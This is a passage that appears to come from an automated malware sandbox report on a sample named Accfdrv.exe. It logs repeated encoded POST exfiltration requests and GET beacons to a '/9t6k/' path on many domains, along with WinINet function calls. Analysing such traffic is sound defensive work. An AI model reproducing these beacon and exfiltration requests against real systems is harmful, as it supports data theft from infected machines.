URflh=2ava8yqCjoRILceXEVM_cJC3(8KXf69fH6Udy2katDZfUKnsUWNnV53CGvWNXEbITWIN5myDzZq62-EF0wfV9W0BcV7gjm4l9S(6bvEk6Ez-hw2NMys3dc~cVeFdzdifbGHufdHtvMQ_nJlbPuG4ms69cT8okArtL8I5~KssFnjeUNDFfqIvJp9JsVYF0_FAiClpbqVFm1ZUPlJNFd01w5wOp-mHqQ1lzZr_MJAU7v324ccTpcFioAsumnM7O_4c4Evx3GA4N7z4tITzAHJXVZKq7N180UuHQUVW1_(Uxx~T8n8yABgbMgkxOu6y05cqmC8jXuhsx1jRXAKr9dzA7s(B5OvY1AHjm10CinzLAzlt5yaV5wczOzwVHBYud1lfbH7qs9dq5VjfJt4jBg).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.dainikamarsomoy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.dainikamarsomoy.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 5a 35 62 49 47 78 76 62 56 32 6e 41 6c 32 79 65 49 63 69 69 6c 70 7a 33 6c 55 38 77 5a 75 38 52 51 2d 76 46 4a 7a 61 45 78 70 4b 7a 4a 74 51 76 4c 56 5a 57 35 31 37 63 44 32 74 6e 59 65 53 7a 48 6d 45 32 28 36 46 51 32 39 79 75 6a 50 32 74 67 5f 6d 47 71 30 39 4c 67 6a 4b 53 30 6b 45 75 45 75 70 34 4a 6c 50 41 41 70 5a 58 48 73 68 54 6c 66 57 6c 52 6e 78 52 35 57 28 69 53 55 79 71 4f 32 31 4d 69 58 4f 4d 41 61 41 52 4b 78 4e 58 44 4b 6e 34 6a 6b 50 6e 33 35 36 4d 52 6d 48 53 74 64 7a 61 30 65 6f 41 72 38 38 5f 6d 41 79 71 39 56 48 65 62 38 31 53 44 46 65 43 4b 5f 49 64 69 36 6e 66 43 66 66 79 28 37 79 76 31 44 43 79 4e 6a 33 6b 48 41 68 4e 62 41 61 57 55 36 77 59 55 67 61 62 62 45 56 65 67 47 7e 6b 62 62 79 69 68 38 42 5a 4f 78 59 6d 55 52 72 66 32 53 30 48 61 70 63 68 70 63 74 76 6d 76 4c 6b 6b 35 56 4d 41 53 4c 53 70 33 70 58 51 77 69 64 6d 72 4a 4d 56 67 72 5a 65 52 78 64 6c 65 67 6d 36 32 59 67 72 6f 35 4c 36 49 57 77 74 33 43 71 6a 62 76 32 62 55 6d 33 42 64 69 5a 32 67 4a 4a 38 49 6f 4f 57 41 28 49 75 69 74 46 30 63 4f 76 4f 6b 28 61 57 57 30 55 32 57 43 37 28 66 6a 50 41 61 49 48 31 35 76 54 32 32 52 46 78 4a 28 6a 45 33 51 30 50 67 75 46 4d 54 58 73 38 32 66 54 45 6b 5a 46 65 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=Z5bIGxvbV2nAl2yeIciilpz3lU8wZu8RQ-vFJzaExpKzJtQvLVZW517cD2tnYeSzHmE2(6FQ29yujP2tg_mGq09LgjKS0kEuEup4JlPAApZXHshTlfWlRnxR5W(iSUyqO21MiXOMAaARKxNXDKn4jkPn356MRmHStdza0eoAr88_mAyq9VHeb81SDFeCK_Idi6nfCffy(7yv1DCyNj3kHAhNbAaWU6wYUgabbEVegG~kbbyih8BZOxYmURrf2S0HapchpctvmvLkk5VMASLSp3pXQwidmrJMVgrZeRxdlegm62Ygro5L6IWwt3Cqjbv2bUm3BdiZ2gJJ8IoOWA(IuitF0cOvOk(aWW0U2WC7(fjPAaIH15vT22RFxJ(jE3Q0PguFMTXs82fTEkZFeg).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kingdomwinecommunity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.kingdomwinecommunity.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 50 6f 7a 79 71 59 39 35 71 50 52 42 4c 66 4b 76 57 6e 5a 44 4d 7a 59 37 4e 50 62 72 37 59 65 70 7a 62 68 4e 36 73 76 7a 7e 61 51 58 41 4c 63 55 47 51 42 68 7a 59 63 4e 73 4c 32 6e 6a 43 64 69 37 62 56 71 50 59 7a 6c 58 47 76 79 30 5f 56 6a 65 37 78 4d 43 46 61 57 75 46 72 32 45 71 62 4b 79 78 35 55 64 30 5a 38 64 49 7e 6b 79 4e 6c 51 62 49 39 6f 71 6b 4e 68 36 6d 4a 79 74 32 53 32 74 44 35 43 38 58 73 4a 68 78 45 4b 67 31 75 32 74 73 36 64 53 43 4c 36 52 4a 35 55 54 78 61 72 46 54 4f 37 67 53 4d 6d 28 35 50 58 62 32 76 75 35 33 56 44 28 4e 64 6a 45 4c 4a 65 62 6b 28 6f 59 39 75 63 6b 62 55 6f 73 53 4a 2d 6e 79 50 38 6f 6e 50 78 6f 7a 78 5a 49 4d 6d 38 69 50 4a 54 66 30 6d 77 37 74 39 78 4e 69 72 63 72 66 33 61 61 62 69 76 4c 64 59 46 53 62 49 4b 68 6b 53 31 65 49 54 46 55 53 51 54 6f 6a 47 38 47 36 67 69 6c 46 70 37 64 49 68 46 64 52 37 50 32 55 30 66 55 56 74 39 45 48 59 37 6f 48 46 64 6f 67 35 49 6d 43 78 4d 61 4a 54 70 79 37 33 4c 45 76 44 63 56 76 63 31 45 5a 37 36 76 68 55 49 6d 59 31 71 6a 4e 72 51 7e 46 49 44 51 47 4c 66 59 70 4c 33 53 35 4a 53 4f 65 62 70 48 6a 53 72 50 6e 54 75 31 4c 64 75 35 39 53 4c 67 46 44 38 73 54 55 4c 68 43 51 38 41 44 46 5f 49 54 59 41 48 67 28 75 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=PozyqY95qPRBLfKvWnZDMzY7NPbr7YepzbhN6svz~aQXALcUGQBhzYcNsL2njCdi7bVqPYzlXGvy0_Vje7xMCFaWuFr2EqbKyx5Ud0Z8dI~kyNlQbI9oqkNh6mJyt2S2tD5C8XsJhxEKg1u2ts6dSCL6RJ5UTxarFTO7gSMm(5PXb2vu53VD(NdjELJebk(oY9uckbUosSJ-nyP8onPxozxZIMm8iPJTf0mw7t9xNircrf3aabivLdYFSbIKhkS1eITFUSQTojG8G6gilFp7dIhFdR7P2U0fUVt9EHY7oHFdog5ImCxMaJTpy73LEvDcVvc1EZ76vhUImY1qjNrQ~FIDQGLfYpL3S5JSOebpHjSrPnTu1Ldu59SLgFD8sTULhCQ8ADF_ITYAHg(u6Q).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.pocketspacer.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.pocketspacer.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.pocketspacer.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 6b 6b 4d 7a 63 57 4d 6c 7e 7a 51 31 58 7a 32 73 68 76 6f 77 4a 69 46 36 38 30 4b 51 61 42 54 5a 30 4d 7e 35 6b 43 7e 63 6c 6f 62 4a 51 35 7a 78 38 57 38 44 75 71 43 35 4c 42 53 61 6d 6b 30 4e 76 49 51 32 6e 46 4a 4f 53 61 73 56 7a 66 33 61 53 4c 66 50 56 57 75 6a 57 37 4d 68 6a 41 67 30 6e 35 4a 74 4d 50 42 6b 42 7a 4f 73 49 57 7e 4e 66 52 71 53 71 75 70 41 43 4b 42 4c 54 77 31 70 62 47 4a 76 30 68 34 59 64 46 79 2d 6f 75 4f 55 51 76 74 39 59 68 7a 2d 78 37 78 44 76 42 55 76 38 34 30 63 69 37 7e 78 4e 6f 78 44 70 51 54 75 46 6e 62 6b 38 61 4b 35 59 67 6a 68 42 4d 76 75 74 6e 78 51 34 55 62 49 6b 69 51 6b 4b 7a 43 75 43 33 45 33 4f 47 6e 33 4d 6b 50 46 4d 54 36 68 7e 43 47 4e 38 62 59 6b 55 49 47 6d 4b 72 41 38 62 34 4f 71 53 6a 37 59 75 4b 36 61 5a 32 71 58 4b 39 4c 5f 51 42 6d 61 7a 58 28 78 45 45 6c 42 78 33 38 6d 47 55 65 41 4b 4a 38 67 4d 42 57 42 31 53 4e 7a 56 6a 4b 7a 77 76 76 37 28 51 73 57 6d 72 6f 61 64 34 62 69 4b 6b 41 68 47 69 41 41 79 38 7a 35 33 51 66 61 62 7a 4d 6e 74 4c 4f 73 39 57 65 53 52 63 51 58 70 61 53 50 35 6f 32 2d 37 41 78 66 6a 43 63 37 34 6d 6f 6a 51 37 61 36 41 69 6c 4a 35 48 41 4d 37 78 70 63 77 51 61 53 57 58 35 4b 6d 39 30 34 28 37 53 4a 32 77 35 32 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=kkMzcWMl~zQ1Xz2shvowJiF680KQaBTZ0M~5kC~clobJQ5zx8W8DuqC5LBSamk0NvIQ2nFJOSasVzf3aSLfPVWujW7MhjAg0n5JtMPBkBzOsIW~NfRqSqupACKBLTw1pbGJv0h4YdFy-ouOUQvt9Yhz-x7xDvBUv840ci7~xNoxDpQTuFnbk8aK5YgjhBMvutnxQ4UbIkiQkKzCuC3E3OGn3MkPFMT6h~CGN8bYkUIGmKrA8b4OqSj7YuK6aZ2qXK9L_QBmazX(xEElBx38mGUeAKJ8gMBWB1SNzVjKzwvv7(QsWmroad4biKkAhGiAAy8z53QfabzMntLOs9WeSRcQXpaSP5o2-7AxfjCc74mojQ7a6AilJ5HAM7xpcwQaSWX5Km904(7SJ2w52zQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.cia3mega.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cia3mega.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.cia3mega.info/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 7a 72 6e 4f 51 6d 4b 54 6b 48 79 41 54 68 69 64 55 4c 59 7a 77 65 35 64 33 4a 42 5a 36 52 6c 4b 6a 6b 74 70 55 47 51 52 4c 43 55 37 33 35 46 61 4c 41 73 47 30 74 4f 54 65 75 61 46 53 37 77 39 59 73 56 77 36 75 65 4e 47 5f 50 4d 6b 53 6a 31 6d 56 62 65 66 47 54 64 38 76 32 5f 62 4c 30 43 37 35 47 7a 4f 67 73 53 45 30 33 62 5a 42 48 79 7a 7a 62 56 77 6b 41 6b 68 4c 52 75 4c 6a 62 55 6f 48 6e 51 43 59 33 6c 72 70 6f 67 49 73 30 49 67 7a 76 37 32 6c 4d 38 75 49 77 47 72 50 6b 4b 6c 6f 52 52 59 75 4a 6a 73 77 45 51 33 4b 56 74 45 49 6d 55 39 58 54 6c 54 76 45 74 28 74 47 44 54 65 4c 2d 7a 37 61 62 61 57 4e 56 76 4e 45 45 46 44 55 4d 52 74 59 70 45 50 68 42 32 51 72 6e 6b 79 30 68 74 77 4b 75 6f 4c 6a 4c 42 33 4d 39 35 57 6e 76 6f 75 45 4c 72 6e 6e 4d 63 79 75 2d 52 44 65 31 46 68 52 35 59 52 4e 5a 6d 5f 7e 54 5a 4c 66 4a 55 77 64 70 73 4c 6b 42 32 44 61 63 46 4b 76 46 75 51 34 67 71 4d 6c 70 68 6b 75 47 37 6d 75 76 4c 44 75 49 35 56 4f 35 28 72 6b 39 6f 76 46 6a 7e 6d 65 4c 6e 68 4c 51 44 6d 47 73 75 72 32 4c 59 66 7e 72 69 35 64 35 35 46 4f 61 4c 37 4a 42 64 5f 6d 76 34 6e 4e 6e 74 6c 6d 34 43 39 6e 6d 47 2d 44 45 6a 64 59 36 70 65 31 54 43 58 76 57 42 2d 73 42 55 33 53 57 43 30 37 61 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=zrnOQmKTkHyAThidULYzwe5d3JBZ6RlKjktpUGQRLCU735FaLAsG0tOTeuaFS7w9YsVw6ueNG_PMkSj1mVbefGTd8v2_bL0C75GzOgsSE03bZBHyzzbVwkAkhLRuLjbUoHnQCY3lrpogIs0Igzv72lM8uIwGrPkKloRRYuJjswEQ3KVtEImU9XTlTvEt(tGDTeL-z7abaWNVvNEEFDUMRtYpEPhB2Qrnky0htwKuoLjLB3M95WnvouELrnnMcyu-RDe1FhR5YRNZm_~TZLfJUwdpsLkB2DacFKvFuQ4gqMlphkuG7muvLDuI5VO5(rk9ovFj~meLnhLQDmGsur2LYf~ri5d55FOaL7JBd_mv4nNntlm4C9nmG-DEjdY6pe1TCXvWB-sBU3SWC07a(A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.makingdoathome.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.makingdoathome.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.makingdoathome.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4d 59 68 34 39 6a 61 39 6f 38 63 76 6d 39 62 6d 4f 6d 4d 36 76 64 6e 56 50 4d 63 71 64 37 6c 35 31 72 76 6b 59 73 7a 49 33 57 6d 6d 53 7a 4f 50 28 41 4e 71 68 33 6b 36 6d 33 54 5a 4c 52 5a 41 5a 4b 51 37 52 4d 6a 6a 38 78 54 6d 37 79 70 51 28 69 74 49 78 63 58 37 46 56 76 59 38 38 66 6f 37 6d 36 6a 53 61 68 36 51 51 4c 64 33 4c 4a 5f 4f 73 75 32 44 56 56 44 46 37 6a 57 6a 30 6d 38 51 74 59 6b 36 44 6e 65 6e 35 6c 76 28 41 70 79 59 79 4e 64 69 74 56 68 42 61 48 61 70 6a 52 43 58 59 53 49 7e 45 44 61 4b 6b 57 75 37 35 4f 71 47 6e 50 35 28 4d 46 41 30 31 4e 36 50 69 44 52 61 30 48 72 48 6a 43 39 6f 33 4b 58 4f 65 7e 7a 6b 70 45 74 64 30 33 48 68 68 4b 6b 69 65 6a 4b 37 66 7e 61 4d 6e 33 55 77 6b 6b 4d 63 42 4c 65 55 59 48 43 55 53 6e 55 69 67 50 42 6b 57 4a 70 4c 76 52 50 35 6a 72 57 79 79 37 56 75 65 45 7a 45 6d 68 30 73 6a 39 62 44 32 73 79 6d 4e 58 55 37 4c 46 49 78 4f 30 33 37 62 73 7a 79 43 35 31 69 39 7e 72 79 77 30 57 69 4d 67 49 78 67 43 37 4a 61 76 70 66 4a 4e 7a 76 6a 77 5a 44 37 72 61 7a 4e 6f 4d 4e 46 64 4c 34 6c 65 34 51 78 66 30 43 4e 6a 52 32 62 36 76 6d 50 6f 49 38 5a 50 57 39 72 58 41 71 52 75 37 4b 73 4b 51 52 35 4a 6d 4a 6d 67 79 55 56 30 49 75 57 4a 72 55 78 51 76 36 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=MYh49ja9o8cvm9bmOmM6vdnVPMcqd7l51rvkYszI3WmmSzOP(ANqh3k6m3TZLRZAZKQ7RMjj8xTm7ypQ(itIxcX7FVvY88fo7m6jSah6QQLd3LJ_Osu2DVVDF7jWj0m8QtYk6Dnen5lv(ApyYyNditVhBaHapjRCXYSI~EDaKkWu75OqGnP5(MFA01N6PiDRa0HrHjC9o3KXOe~zkpEtd03HhhKkiejK7f~aMn3UwkkMcBLeUYHCUSnUigPBkWJpLvRP5jrWyy7VueEzEmh0sj9bD2symNXU7LFIxO037bszyC51i9~ryw0WiMgIxgC7JavpfJNzvjwZD7razNoMNFdL4le4Qxf0CNjR2b6vmPoI8ZPW9rXAqRu7KsKQR5JmJmgyUV0IuWJrUxQv6A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.rodgroup.netConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rodgroup.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.rodgroup.net/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 78 58 33 30 78 53 34 72 49 4c 54 5f 4d 79 35 71 74 4c 37 2d 6f 48 6e 71 39 32 4b 4d 59 69 57 75 52 59 55 6e 33 4f 5a 75 39 61 42 52 43 49 5a 36 37 5a 76 50 6d 32 54 62 42 6d 46 4b 49 2d 4d 31 79 71 66 52 5a 55 56 4f 4e 41 41 69 74 51 4a 71 6a 44 43 35 7a 4e 54 41 28 72 6e 43 70 76 64 62 63 79 78 58 6f 43 43 61 66 77 52 79 71 67 6d 50 6e 71 78 6a 35 6d 57 51 6c 58 37 74 54 50 69 62 71 77 35 32 4a 39 61 6f 58 33 31 34 6c 62 28 65 53 73 69 34 6a 45 49 2d 39 66 50 38 37 58 71 2d 57 6b 71 39 69 4d 6c 4b 46 78 53 30 53 72 32 57 7a 43 56 64 38 4d 54 65 53 32 66 31 45 72 66 44 37 57 59 71 34 4c 50 4d 57 70 66 63 47 59 44 73 36 6d 47 71 48 30 68 6f 64 37 71 44 41 4f 52 5a 52 47 65 76 6c 53 41 51 71 6d 39 30 4f 51 33 56 38 72 38 53 42 6a 52 56 51 4c 5a 57 54 65 45 46 6f 53 77 61 52 5a 38 52 64 50 42 33 43 6b 52 48 7a 6f 78 56 73 33 62 79 57 73 56 66 65 57 53 35 6d 79 55 46 76 6e 71 77 6d 49 69 31 77 63 6c 54 4e 4f 34 31 7a 4a 35 62 77 71 31 50 4e 30 52 56 70 5f 4d 59 59 4f 67 45 76 4a 79 52 43 6d 68 46 51 78 66 57 38 46 50 65 73 31 65 77 48 73 67 76 7e 6d 46 75 79 41 79 70 46 5f 79 64 71 48 31 47 39 2d 67 68 71 65 6d 37 63 74 57 44 39 76 67 67 4d 77 38 70 79 46 6c 52 55 6d 63 5f 68 31 45 75 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=xX30xS4rILT_My5qtL7-oHnq92KMYiWuRYUn3OZu9aBRCIZ67ZvPm2TbBmFKI-M1yqfRZUVONAAitQJqjDC5zNTA(rnCpvdbcyxXoCCafwRyqgmPnqxj5mWQlX7tTPibqw52J9aoX314lb(eSsi4jEI-9fP87Xq-Wkq9iMlKFxS0Sr2WzCVd8MTeS2f1ErfD7WYq4LPMWpfcGYDs6mGqH0hod7qDAORZRGevlSAQqm90OQ3V8r8SBjRVQLZWTeEFoSwaRZ8RdPB3CkRHzoxVs3byWsVfeWS5myUFvnqwmIi1wclTNO41zJ5bwq1PN0RVp_MYYOgEvJyRCmhFQxfW8FPes1ewHsgv~mFuyAypF_ydqH1G9-ghqem7ctWD9vggMw8pyFlRUmc_h1Euxw).

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_040FD37C InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

5_2_040FD37C

Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
